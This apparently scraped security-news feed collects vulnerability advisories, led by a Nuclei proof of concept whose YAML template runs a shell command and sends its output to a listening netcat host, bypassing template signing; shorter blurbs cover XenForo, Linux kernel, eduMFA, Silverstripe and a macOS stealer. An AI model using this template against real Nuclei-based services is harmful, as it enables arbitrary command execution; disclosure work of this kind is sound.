#web

### Summary Find a way to execute code template without -code option and signature. ### Details write a `code.yaml`: ```yaml id: code info: name: example code template author: ovi3 code: - engine: - sh - bash source: | id http: - raw: - | POST /re HTTP/1.1 Host: {{Hostname}} {{code_response}} workflows: - matchers: - name: t ``` using nc to listen on 80: ```bash nc -lvvnp 80 ``` execute PoC template with nuclei: ```bash ./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debug ``` and nc will get `id` command output. We use `-w` to specify a workflow file, not `-t` to template file. and notice there is a `workflows` field in code.yaml to pretend to be a workflow file. Test in Linux and Nuclei v3.2.9 ### Impact Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web ...

XenForo versions 2.2.15 and below suffer from a remote code execution vulnerability in the Template system.

XenForo versions 2.2.15 and below suffer from a cross site request forgery vulnerability in Widget::actionSave.

Hospital Management System Project in ASP.Net MVC version 1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the netfilter connection tracker for netlink in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). Various other issues were also addressed.

Red Hat Security Advisory 2024-4590-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Security Advisory 2024-4586-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Cybersecurity researchers have discovered an updated variant of a known stealer malware that attackers affiliated with the Democratic People's Republic of Korea (DPRK) have delivered as part of prior cyber espionage campaigns targeting job seekers. The artifact in question is an Apple macOS disk image (DMG) file named "MiroTalk.dmg" that mimics the legitimate video call service of the same name,

### Summary BlastRADIUS (see blastradius.fail for details) also affects eduMFA prior version 2.2.0, because the Message-Authenticator attributes were not checked. ### Details Website with the vulnerability information blastradius.fail The original vulnerability has been assigned CVE-2024-3596 Case in vince: https://kb.cert.org/vuls/id/456537 ### PoC There is no known proof-of-concept except for the attack shown in the paper from the researchers ### Impact An attacker can trigger an authentication flow with a RADIUS-backed token, intercept the RADIUS packet sent by eduMFA and modify the RADIUS server's answer, which would lead eduMFA to believe that the token is valid, even though the RADIUS servers answer was a reject.

### Impact A bad actor with access to edit content in the CMS could send a specifically crafted encoded payload to the server, which could be used to inject a JavaScript payload on the front end of the site. The payload would be sanitised on the client-side, but server-side sanitisation doesn't catch it. The server-side sanitisation logic has been updated to sanitise against this type of attack. ### References - https://www.silverstripe.org/download/security-releases/cve-2024-32981